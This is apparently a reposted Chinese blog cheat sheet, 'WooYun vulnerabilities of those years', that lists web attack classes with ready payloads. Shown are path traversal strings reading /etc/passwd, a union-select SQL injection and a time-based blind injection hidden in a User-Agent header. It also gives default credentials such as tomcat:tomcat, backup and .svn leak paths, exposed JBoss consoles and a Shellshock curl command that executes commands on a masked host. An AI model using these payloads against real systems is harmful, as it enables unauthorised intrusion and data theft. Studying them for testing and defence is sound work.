那些年 WooYun 的漏洞

Type:

  • 任意文件读取

    ../../../../../../../../../../etc/passwd%00
    /etc/sysconfig/network
    ../../../foo/../../../../etc/passwd   //nodejs
  • SQL注入

    and 1=2 union select 1,2,version(),3%23
    框架注入(ThinkPHP)
    GET POST 参数
    伪静态  *
    Referer
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87'XOR(if(now()=sysdate(),sleep(5*5*0),0))OR'
  • 弱口令

    Username:中国姓名排行TOP500
    Password:admin  admin123 qyer           //字典的重要性!!!
    /manager/html  tomcat:tomcat
    ftp 弱口令  phpmyadmin 弱口令
  • 敏感信息泄露

    .bak  /.svn/entries  wwwroot.tar.gz .swp  web.rar
    openssl
    目录遍历
    shodan
    github 敏感信息
  • 未授权访问

    RSYNC 匿名访问
    JBoss:/jmx-console/  /admin-console/
  • 命令执行

    CMS(discuz、)命令执行
    curl http://1XX.XX.XX.XX:8082/cgi-bin/test-cgi -A "() { foo;};echo;/bin/ps -ef" -k
    http://test.xxx.com:8082/struts_spy/example/HelloWorld.action //struts2
  • 任意文件上传

    cer、
  • SSRF

    url=           //ip服务
  • 设计缺陷

    验证码可识别

猜你喜欢

转载自www.cnblogs.com/skrr/p/10987425.html